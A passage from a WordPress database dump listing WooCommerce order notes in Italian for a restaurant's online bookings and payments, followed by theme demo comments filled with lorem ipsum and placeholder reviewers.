da In attesa di pagamento a Cancellato.',0,'1','WooCommerce','order_note',0,0),(1013,893,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-10-02 20:09:52','2019-10-02 18:09:52','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(1014,893,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-10-02 20:09:56','2019-10-02 18:09:56','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(1063,895,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-10-17 18:33:40','2019-10-17 16:33:40','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(1064,895,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-10-17 18:33:42','2019-10-17 16:33:42','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(1067,897,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-10-31 13:59:23','2019-10-31 12:59:23','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(1068,897,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-10-31 13:59:25','2019-10-31 12:59:25','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(1070,906,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-12-11 16:15:09','2019-12-11 15:15:09','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(1071,906,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-12-11 16:15:16','2019-12-11 15:15:16','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(1072,912,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-12-16 21:43:33','2019-12-16 20:43:33','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(1073,912,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-12-16 21:43:38','2019-12-16 20:43:38','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(1074,914,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-12-18 13:54:28','2019-12-18 12:54:28','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(1075,914,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-12-18 13:54:30','2019-12-18 12:54:30','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(1076,915,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-12-18 14:38:17','2019-12-18 13:38:17','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(1077,915,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-12-18 14:38:21','2019-12-18 13:38:21','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(1078,916,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-12-18 15:09:18','2019-12-18 14:09:18','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(1079,916,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-12-18 15:09:26','2019-12-18 14:09:26','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(1080,917,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-12-18 18:11:19','2019-12-18 17:11:19','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(1081,917,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-12-18 18:11:24','2019-12-18 17:11:24','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(1082,918,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-12-18 18:50:19','2019-12-18 17:50:19','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(1083,918,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-12-18 18:50:21','2019-12-18 17:50:21','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(1084,919,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-12-18 19:34:09','2019-12-18 18:34:09','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(1085,919,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-12-18 19:34:13','2019-12-18 18:34:13','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(1086,920,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-12-18 23:55:50','2019-12-18 22:55:50','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(1087,920,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-12-18 23:55:52','2019-12-18 22:55:52','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(1088,921,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-12-21 19:01:55','2019-12-21 18:01:55','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(1089,921,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-12-21 19:01:57','2019-12-21 18:01:57','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(1090,922,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-12-22 12:12:23','2019-12-22 11:12:23','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(1091,922,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-12-22 12:12:29','2019-12-22 11:12:29','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(1092,924,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-12-22 16:03:52','2019-12-22 15:03:52','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(1093,924,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-12-22 16:03:53','2019-12-22 15:03:53','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(1094,920,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-12-22 20:09:08','2019-12-22 19:09:08','Stato dell\'ordine impostato su rimborsato. Per rimborsare il cliente è necessario emettere un rimborso mediante il proprio gateway di pagamento.',0,'1','WooCommerce','order_note',0,0),(1095,920,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-12-22 20:09:08','2019-12-22 19:09:08','Pagamento refunded tramite IPN. Lo stato dell\'ordine è cambiato da In lavorazione a Rimborsato.',0,'1','WooCommerce','order_note',0,0),(1096,926,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-12-23 10:30:46','2019-12-23 09:30:46','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(1097,926,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-12-23 10:30:48','2019-12-23 09:30:48','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(1098,927,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-12-23 10:46:45','2019-12-23 09:46:45','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(1099,927,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-12-23 10:46:53','2019-12-23 09:46:53','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(1100,930,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-12-23 17:01:31','2019-12-23 16:01:31','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(1101,930,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-12-23 17:01:33','2019-12-23 16:01:33','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(1102,932,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-12-23 18:43:47','2019-12-23 17:43:47','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(1103,932,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-12-23 18:43:49','2019-12-23 17:43:49','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(1104,933,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-12-28 08:18:55','2019-12-28 07:18:55','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(1105,933,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-12-28 08:18:57','2019-12-28 07:18:57','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(1106,934,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-12-28 18:02:27','2019-12-28 17:02:27','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(1107,934,'WooCommerce','woocommerce@ristorantesolymar.it','','','2019-12-28 18:02:43','2019-12-28 17:02:43','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(1108,926,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-01-01 20:43:24','2020-01-01 19:43:24','Stato dell\'ordine impostato su rimborsato. Per rimborsare il cliente è necessario emettere un rimborso mediante il proprio gateway di pagamento.',0,'1','WooCommerce','order_note',0,0),(1109,926,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-01-01 20:43:24','2020-01-01 19:43:24','Pagamento refunded tramite IPN. Lo stato dell\'ordine è cambiato da In lavorazione a Rimborsato.',0,'1','WooCommerce','order_note',0,0),(1111,936,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-01-26 12:14:36','2020-01-26 11:14:36','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(1112,936,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-01-26 12:14:37','2020-01-26 11:14:37','Livelli del magazzino ridotti: Prenotazione Tavolo per 2 Persone San Valentino (sanvalentino-tavolox2) 1&rarr;0',0,'1','WooCommerce','order_note',0,0),(1113,936,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-01-26 12:14:39','2020-01-26 11:14:39','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(1120,949,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-02-01 18:41:01','2020-02-01 17:41:01','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(1121,949,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-02-01 18:41:01','2020-02-01 17:41:01','Livelli del magazzino ridotti: Prenotazione Tavolo per 2 Persone San Valentino (sanvalentino-tavolox2) 16&rarr;15',0,'1','WooCommerce','order_note',0,0),(1122,949,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-02-01 18:41:01','2020-02-01 17:41:01','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(1123,950,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-02-03 16:22:48','2020-02-03 15:22:48','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(1124,950,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-02-03 16:22:49','2020-02-03 15:22:49','Livelli del magazzino ridotti: Prenotazione Tavolo per 2 Persone San Valentino (sanvalentino-tavolox2) 15&rarr;14',0,'1','WooCommerce','order_note',0,0),(1125,950,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-02-03 16:22:49','2020-02-03 15:22:49','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(1126,951,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-02-04 22:22:52','2020-02-04 21:22:52','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(1127,951,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-02-04 22:22:52','2020-02-04 21:22:52','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(1128,953,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-02-05 20:46:45','2020-02-05 19:46:45','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(1129,953,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-02-05 20:46:45','2020-02-05 19:46:45','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(1130,954,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-02-06 17:22:39','2020-02-06 16:22:39','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(1131,954,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-02-06 17:22:40','2020-02-06 16:22:40','Livelli del magazzino ridotti: Prenotazione Tavolo per 2 Persone San Valentino (sanvalentino-tavolox2) 14&rarr;13',0,'1','WooCommerce','order_note',0,0),(1132,954,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-02-06 17:22:40','2020-02-06 16:22:40','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(1133,955,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-02-07 11:53:20','2020-02-07 10:53:20','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(1134,955,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-02-07 11:53:20','2020-02-07 10:53:20','Livelli del magazzino ridotti: Prenotazione Tavolo per 2 Persone San Valentino (sanvalentino-tavolox2) 13&rarr;12',0,'1','WooCommerce','order_note',0,0),(1135,955,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-02-07 11:53:20','2020-02-07 10:53:20','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(1136,956,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-02-09 11:46:28','2020-02-09 10:46:28','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(1137,956,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-02-09 11:46:28','2020-02-09 10:46:28','Livelli del magazzino ridotti: Prenotazione Tavolo per 2 Persone San Valentino (sanvalentino-tavolox2) 12&rarr;11',0,'1','WooCommerce','order_note',0,0),(1138,956,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-02-09 11:46:28','2020-02-09 10:46:28','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(1139,957,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-02-09 17:35:38','2020-02-09 16:35:38','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(1140,957,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-02-09 17:35:38','2020-02-09 16:35:38','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(1141,958,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-02-10 13:27:58','2020-02-10 12:27:58','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(1142,958,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-02-10 13:27:58','2020-02-10 12:27:58','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(1143,960,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-02-11 14:53:12','2020-02-11 13:53:12','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(1144,960,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-02-11 14:53:12','2020-02-11 13:53:12','Livelli del magazzino ridotti: Prenotazione Tavolo per 2 Persone San Valentino (sanvalentino-tavolox2) 5&rarr;4',0,'1','WooCommerce','order_note',0,0),(1145,960,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-02-11 14:53:12','2020-02-11 13:53:12','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(1146,961,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-02-11 17:15:17','2020-02-11 16:15:17','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(1147,961,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-02-11 17:15:17','2020-02-11 16:15:17','Livelli del magazzino ridotti: Prenotazione Tavolo per 2 Persone San Valentino (sanvalentino-tavolox2) 4&rarr;3',0,'1','WooCommerce','order_note',0,0),(1148,961,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-02-11 17:15:17','2020-02-11 16:15:17','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(1149,962,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-02-11 19:13:27','2020-02-11 18:13:27','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(1150,962,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-02-11 19:13:27','2020-02-11 18:13:27','Livelli del magazzino ridotti: Prenotazione Tavolo per 2 Persone San Valentino (sanvalentino-tavolox2) 3&rarr;2',0,'1','WooCommerce','order_note',0,0),(1151,962,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-02-11 19:13:27','2020-02-11 18:13:27','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(1156,967,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-06-05 18:22:09','2020-06-05 16:22:09','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(1157,967,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-06-05 18:22:09','2020-06-05 16:22:09','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(1158,967,'magnaromagna','webmaster@baldisserri.com','','','2020-06-08 23:08:25','2020-06-08 21:08:25','Order details manually sent to customer.',0,'1','WooCommerce','order_note',0,0),(1161,896,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-06-17 09:57:37','2020-06-17 07:57:37','Ordine non pagato annullato - tempo limite raggiunto. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Annullato.',0,'1','WooCommerce','order_note',0,0),(1162,929,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-06-17 09:57:37','2020-06-17 07:57:37','Ordine non pagato annullato - tempo limite raggiunto. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Annullato.',0,'1','WooCommerce','order_note',0,0),(1163,931,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-06-17 09:57:37','2020-06-17 07:57:37','Ordine non pagato annullato - tempo limite raggiunto. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Annullato.',0,'1','WooCommerce','order_note',0,0),(1164,959,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-06-17 09:57:38','2020-06-17 07:57:38','Ordine non pagato annullato - tempo limite raggiunto. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Annullato.',0,'1','WooCommerce','order_note',0,0),(1165,963,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-06-17 09:57:38','2020-06-17 07:57:38','Ordine non pagato annullato - tempo limite raggiunto. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Annullato.',0,'1','WooCommerce','order_note',0,0),(1175,1051,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-08-04 15:02:58','2020-08-04 13:02:58','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(1176,1051,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-08-04 15:02:58','2020-08-04 13:02:58','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(1180,1124,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-10-19 14:47:03','2020-10-19 12:47:03','Ordine non pagato annullato - tempo limite raggiunto. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Annullato.',0,'1','WooCommerce','order_note',0,0),(1181,1127,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-10-24 09:31:23','2020-10-24 07:31:23','Ordine non pagato annullato - tempo limite raggiunto. Lo stato dell\'ordine è cambiato da In attesa di pagamento a Annullato.',0,'1','WooCommerce','order_note',0,0),(1182,1141,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-10-25 21:01:14','2020-10-25 20:01:14','Pagamento IPN completato',0,'1','WooCommerce','order_note',0,0),(1183,1141,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-10-25 21:01:15','2020-10-25 20:01:15','Lo stato dell\'ordine è cambiato da In attesa di pagamento a In lavorazione.',0,'1','WooCommerce','order_note',0,0),(1184,1222,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-11-05 20:04:17','2020-11-05 19:04:17','IPN payment completed',0,'1','WooCommerce','order_note',0,0),(1185,1222,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-11-05 20:04:17','2020-11-05 19:04:17','Order status changed from Pending payment to Processing.',0,'1','WooCommerce','order_note',0,0),(1193,1257,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-11-28 15:28:11','2020-11-28 14:28:11','IPN payment completed',0,'1','WooCommerce','order_note',0,0),(1194,1257,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-11-28 15:28:11','2020-11-28 14:28:11','Order status changed from Pending payment to Processing.',0,'1','WooCommerce','order_note',0,0),(1285,1677,'linda_steele','lindaaa_steele@mail.com','','217.24.25.23','2018-08-23 12:36:15','2018-08-23 12:36:15','Curabitur ullamcorper ultricies nisi. Nam eget dui. Etiam rhoncus. Maecenas tempus, tellus eget condimentum rhoncus, sem quam semper libero, sit amet adipiscing sem neque sed ipsum. Nam quam nunc, blandit vel, luctus pulvinar, hendrerit id, lorem.',0,'1','','comment',0,0),(1286,1681,'linda_steele','lindaaa_steele@mail.com','','217.24.25.23','2018-08-23 12:38:00','2018-08-23 12:38:00','Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes.',0,'1','','comment',0,0),(1200,3106,'Ben Glyde','bg@example.com','','217.24.25.23','2018-07-31 10:28:45','2018-07-31 10:28:45','Urna nec tincidunt praesent semper feugiat nibh sed. Ac placerat vestibulum lectus mauris ultrices eros in cursus. Sagittis vitae et leo duis. Neque gravida in fermen tum et, great food!',0,'1','','comment',0,0),(1201,98,'Ella Crowder','ec@example.com','','217.24.25.23','2018-07-31 10:39:40','2018-07-31 10:39:40','Geat food in town!',0,'1','','comment',0,0),(1202,98,'admin','support@mikado-themes.com','','217.24.25.23','2018-08-15 11:36:14','2018-08-15 11:36:14','test',0,'1','','comment',0,0),(1203,3107,'Rose Bonnor','rb@fakemail.com','','217.24.25.23','2018-07-31 10:40:19','2018-07-31 10:40:19','Bibendum arcu vitae elementum curabitur vitae nunc sed velit. Diam volutpat commodo sed egestas egestas fringilla. Massa eget egestas purus viverra accumsan in nisl. Adipiscing at in tellus integer.',0,'1','','comment',0,0),(1204,3108,'Ben Glyde','bg@example.com','','217.24.25.23','2018-07-31 10:41:12','2018-07-31 10:41:12','Great food!',0,'1','','comment',0,0),(1205,3109,'Ella Crowder','ec@example.com','','217.24.25.23','2018-07-31 10:50:38','2018-07-31 10:50:38','Great food! The best in the town!',0,'1','','comment',0,0),(1206,3110,'Rose Bonnor','rb@fakemail.com','','217.24.25.23','2018-07-31 10:51:11','2018-07-31 10:51:11','Ipsum consequat nisl vel pretium lectus quam id. Sit amet luctus venenatis lectus magna fringilla urna porttitor. Consequat semper viverra nam libero justo laoreet. Integer eget aliquet nibh praesent.',0,'1','','comment',0,0),(1207,3111,'Ben Glyde','bg@example.com','','217.24.25.23','2018-07-31 10:51:54','2018-07-31 10:51:54','Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Viverra nibh cras pulvinar mattis.',0,'1','','comment',0,0),(1208,177,'Ella Crowder','ec@example.com','','217.24.25.23','2018-07-31 10:52:45','2018-07-31 10:52:45','Great!',0,'1','','comment',0,0),(1209,180,'Rose Bonnor','rb@fakemail.com','','217.24.25.23','2018-07-31 10:53:32','2018-07-31 10:53:32','Dictumst vestibulum rhoncus est pellentesque elit ullamcorper. Neque sodales ut etiam sit amet nisl purus in. Volutpat odio facilisis mauris sit. In fermentum et sollicitudin ac orci.',0,'1','','comment',0,0),(1210,180,'Ben Glyde','bg@example.com','','217.24.25.23','2018-07-31 11:00:21','2018-07-31 11:00:21','Great!',0,'1','','comment',0,0),(1211,3112,'Ben Glyde','bg@example.com','','217.24.25.23','2018-07-31 10:54:31','2018-07-31 10:54:31','Not so good dish.',0,'1','','comment',0,0),(1212,3112,'Ella Crowder','ec@example.com','','217.24.25.23','2018-07-31 11:01:08','2018-07-31 11:01:08','Great!',0,'1','','comment',0,0),(1213,3113,'Ella Crowder','ec@example.com','','217.24.25.23','2018-07-31 10:59:07','2018-07-31 10:59:07','Augue mauris augue neque gravida in fermentum et sollicitudin ac. Velit scelerisque in dictum non consectetur a. Interdum velit euismod in pellentesque massa placerat duis ultricies. Nec feugiat in fermentum posuere urna nec tincidunt praesent.',0,'1','','comment',0,0),(1214,3114,'Rose Bonnor','rb@fakemail.com','','217.24.25.23','2018-07-31 11:01:31','2018-07-31 11:01:31','Augue mauris augue neque gravida in fermentum et sollicitudin ac. Velit scelerisque in dictum non consectetur a. Interdum velit euismod in pellentesque massa placerat duis ultricies. Nec feugiat in fermentum posuere urna nec tincidunt praesent.',0,'1','','comment',0,0),(1291,1685,'Mildred Burns','mildred-82@example.com','','217.24.25.23','2018-08-23 12:33:27','2018-08-23 12:33:27','Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus nullam quis ante.',0,'1','','comment',0,0),(1290,1685,'Kalli Brener','k.brener@example.com','','217.24.25.23','2018-08-23 12:33:05','2018-08-23 12:33:05','Curabitur ullamcorper ultricies nisi. Nam eget dui. Etiam rhoncus. Maecenas tempus, tellus eget condimentum rhoncus, sem quam semper libero, sit amet adipiscing sem neque sed ipsum. Nam quam nunc, blandit vel, luctus pulvinar, hendrerit id, lorem.',0,'1','','comment',0,0),(1289,1685,'linda_steele','lindaaa_steele@mail.com','','217.24.25.23','2018-08-23 12:32:45','2018-08-23 12:32:45','Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes.',0,'1','','comment',0,0),(1288,1681,'Kalli Brener','k.brener@example.com','','217.24.25.23','2018-08-23 12:38:54','2018-08-23 12:38:54','Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus nullam quis ante.',0,'1','','comment',0,0),(1287,1681,'Mildred Burns','mildred-82@example.com','','217.24.25.23','2018-08-23 12:38:32','2018-08-23 12:38:32','Curabitur ullamcorper ultricies nisi. Nam eget dui. Etiam rhoncus. Maecenas tempus, tellus eget condimentum rhoncus, sem quam semper libero, sit amet adipiscing sem neque sed ipsum. Nam quam nunc, blandit vel, luctus pulvinar, hendrerit id, lorem.',0,'1','','comment',0,0),(1230,3115,'Ella Crowder','ec@example.com','','217.24.25.23','2018-08-01 15:35:52','2018-08-01 15:35:52','Good.',0,'1','','comment',0,0),(1231,3116,'Ben Glyde','bg@example.com','','217.24.25.23','2018-08-01 15:36:27','2018-08-01 15:36:27','Great!',0,'1','','comment',0,0),(1232,3117,'Rose Bonnor','rb@fakemail.com','','217.24.25.23','2018-08-01 15:37:07','2018-08-01 15:37:07','Really good!',0,'1','','comment',0,0),(1233,3118,'Rose Bonnor','rb@fakemail.com','','217.24.25.23','2018-08-01 15:38:45','2018-08-01 15:38:45','Really nice food.',0,'1','','comment',0,0),(1234,3119,'Ben Glyde','bg@example.com','','217.24.25.23','2018-08-01 15:37:31','2018-08-01 15:37:31','Great!',0,'1','','comment',0,0),(1235,3120,'Ella Crowder','ec@example.com','','217.24.25.23','2018-08-01 15:39:49','2018-08-01 15:39:49','Great food!',0,'1','','comment',0,0),(1236,3121,'Ben Glyde','bg@example.com','','217.24.25.23','2018-08-01 15:39:22','2018-08-01 15:39:22','The best dish in town!',0,'1','','comment',0,0),(1237,3122,'Ben Glyde','bg@example.com','','217.24.25.23','2018-08-03 15:02:58','2018-08-03 15:02:58','Great!',0,'1','','comment',0,0),(1238,528,'Ella Crowder','ec@example.com','','217.24.25.23','2018-08-03 15:03:26','2018-08-03 15:03:26','Not bad.',0,'1','','comment',0,0),(1239,530,'Rose Bonnor','rb@fakemail.com','','217.24.25.23','2018-08-03 15:04:54','2018-08-03 15:04:54','Senectus et netus et malesuada fames ac turpis. Lectus quam id leo in. Eu volutpat odio facilisis mauris sit amet massa vitae tortor. Purus ut faucibus pulvinar elementum integer enim.',0,'1','','comment',0,0),(1240,3123,'Ben Glyde','bg@example.com','','217.24.25.23','2018-08-03 15:05:13','2018-08-03 15:05:13','Senectus et netus et malesuada fames ac turpis. Lectus quam id leo in. Eu volutpat odio facilisis mauris sit amet massa vitae tortor. Purus ut faucibus pulvinar elementum integer enim.',0,'1','','comment',0,0),(1241,3124,'Ella Crowder','ec@example.com','','217.24.25.23','2018-08-03 15:09:14','2018-08-03 15:09:14','Great!',0,'1','','comment',0,0),(1242,3125,'Ella Crowder','ec@example.com','','217.24.25.23','2018-08-03 15:10:21','2018-08-03 15:10:21','Nice!',0,'1','','comment',0,0),(1243,3125,'Ben Glyde','bg@example.com','','217.24.25.23','2018-08-03 15:12:14','2018-08-03 